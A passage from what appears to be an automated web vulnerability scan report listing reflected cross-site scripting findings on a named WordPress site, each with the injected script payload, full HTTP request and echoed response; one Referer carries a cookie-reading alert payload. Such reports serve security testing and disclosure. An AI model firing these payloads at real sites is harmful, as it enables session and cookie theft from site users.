Path:   /wp-content/themes/rt_mynxx_wp/js/mootools.bgiframe.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad4c8"><script>alert(1)</script>947ed6e118b was submitted in the REST URL parameter 5. This input was echoed as ad4c8\"><script>alert(1)</script>947ed6e118b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/rt_mynxx_wp/js/mootools.bgiframe.jsad4c8"><script>alert(1)</script>947ed6e118b HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:17:47 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:17:48 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44397

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/mootools.bgiframe.jsad4c8\"><script>alert(1)</script>947ed6e118b" type="hidden" />
...[SNIP]...

1.227. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/mootools.bgiframe.js [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/mootools.bgiframe.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b497c"><script>alert(1)</script>b8f47762f1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b497c\"><script>alert(1)</script>b8f47762f1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/rt_mynxx_wp/js/mootools.bgiframe.js?b497c"><script>alert(1)</script>b8f47762f1=1 HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:15:19 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:15:21 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44430

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/mootools.bgiframe.js?b497c\"><script>alert(1)</script>b8f47762f1=1" type="hidden" />
...[SNIP]...

1.228. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/mootools.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/mootools.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b04e"><script>alert(1)</script>f1d8e19c41e was submitted in the REST URL parameter 1. This input was echoed as 4b04e\"><script>alert(1)</script>f1d8e19c41e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content4b04e"><script>alert(1)</script>f1d8e19c41e/themes/rt_mynxx_wp/js/mootools.js HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:17:01 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:17:02 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44379

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content4b04e\"><script>alert(1)</script>f1d8e19c41e/themes/rt_mynxx_wp/js/mootools.js" type="hidden" />
...[SNIP]...

1.229. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/mootools.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/mootools.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aae8c"><script>alert(1)</script>373a71fb8c9 was submitted in the REST URL parameter 2. This input was echoed as aae8c\"><script>alert(1)</script>373a71fb8c9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themesaae8c"><script>alert(1)</script>373a71fb8c9/rt_mynxx_wp/js/mootools.js HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:17:24 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:17:25 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44379

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themesaae8c\"><script>alert(1)</script>373a71fb8c9/rt_mynxx_wp/js/mootools.js" type="hidden" />
...[SNIP]...

1.230. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/mootools.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/mootools.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4663"><script>alert(1)</script>c19256b1321 was submitted in the REST URL parameter 3. This input was echoed as d4663\"><script>alert(1)</script>c19256b1321 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/rt_mynxx_wpd4663"><script>alert(1)</script>c19256b1321/js/mootools.js HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:17:48 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:17:48 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44379

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes/rt_mynxx_wpd4663\"><script>alert(1)</script>c19256b1321/js/mootools.js" type="hidden" />
...[SNIP]...

1.231. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/mootools.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/mootools.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 698f7"><script>alert(1)</script>7b051221727 was submitted in the REST URL parameter 4. This input was echoed as 698f7\"><script>alert(1)</script>7b051221727 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/rt_mynxx_wp/js698f7"><script>alert(1)</script>7b051221727/mootools.js HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:18:11 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:18:11 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44379

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js698f7\"><script>alert(1)</script>7b051221727/mootools.js" type="hidden" />
...[SNIP]...

1.232. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/mootools.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/mootools.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 610e3"><script>alert(1)</script>9e4f995fd8 was submitted in the REST URL parameter 5. This input was echoed as 610e3\"><script>alert(1)</script>9e4f995fd8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/rt_mynxx_wp/js/mootools.js610e3"><script>alert(1)</script>9e4f995fd8 HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:18:34 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:18:34 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44377

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/mootools.js610e3\"><script>alert(1)</script>9e4f995fd8" type="hidden" />
...[SNIP]...

1.233. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/mootools.js [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/mootools.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6cbfe"><script>alert(1)</script>a2e2aad63fc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6cbfe\"><script>alert(1)</script>a2e2aad63fc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/rt_mynxx_wp/js/mootools.js?6cbfe"><script>alert(1)</script>a2e2aad63fc=1 HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:15:19 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:15:21 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44414

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/mootools.js?6cbfe\"><script>alert(1)</script>a2e2aad63fc=1" type="hidden" />
...[SNIP]...

1.234. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/rokbox.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/rokbox/rokbox.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9ae7"><script>alert(1)</script>bc045cc4635 was submitted in the REST URL parameter 1. This input was echoed as f9ae7\"><script>alert(1)</script>bc045cc4635 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-contentf9ae7"><script>alert(1)</script>bc045cc4635/themes/rt_mynxx_wp/js/rokbox/rokbox.js HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:18:11 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:18:12 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44389

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-contentf9ae7\"><script>alert(1)</script>bc045cc4635/themes/rt_mynxx_wp/js/rokbox/rokbox.js" type="hidden" />
...[SNIP]...

1.235. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/rokbox.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/rokbox/rokbox.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3d30"><script>alert(1)</script>d127e7741ba was submitted in the REST URL parameter 2. This input was echoed as c3d30\"><script>alert(1)</script>d127e7741ba in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themesc3d30"><script>alert(1)</script>d127e7741ba/rt_mynxx_wp/js/rokbox/rokbox.js HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:18:34 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:18:35 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44389

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themesc3d30\"><script>alert(1)</script>d127e7741ba/rt_mynxx_wp/js/rokbox/rokbox.js" type="hidden" />
...[SNIP]...

1.236. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/rokbox.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/rokbox/rokbox.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e5e5"><script>alert(1)</script>d1598515b7f was submitted in the REST URL parameter 3. This input was echoed as 3e5e5\"><script>alert(1)</script>d1598515b7f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/rt_mynxx_wp3e5e5"><script>alert(1)</script>d1598515b7f/js/rokbox/rokbox.js HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:18:57 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:18:58 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44389

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp3e5e5\"><script>alert(1)</script>d1598515b7f/js/rokbox/rokbox.js" type="hidden" />
...[SNIP]...

1.237. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/rokbox.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/rokbox/rokbox.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb483"><script>alert(1)</script>90adedb165d was submitted in the REST URL parameter 4. This input was echoed as fb483\"><script>alert(1)</script>90adedb165d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/rt_mynxx_wp/jsfb483"><script>alert(1)</script>90adedb165d/rokbox/rokbox.js HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:19:12 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:19:12 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44389

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/jsfb483\"><script>alert(1)</script>90adedb165d/rokbox/rokbox.js" type="hidden" />
...[SNIP]...

1.238. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/rokbox.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/rokbox/rokbox.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c74c9"><script>alert(1)</script>4edf3969538 was submitted in the REST URL parameter 5. This input was echoed as c74c9\"><script>alert(1)</script>4edf3969538 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/rt_mynxx_wp/js/rokboxc74c9"><script>alert(1)</script>4edf3969538/rokbox.js HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:19:20 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
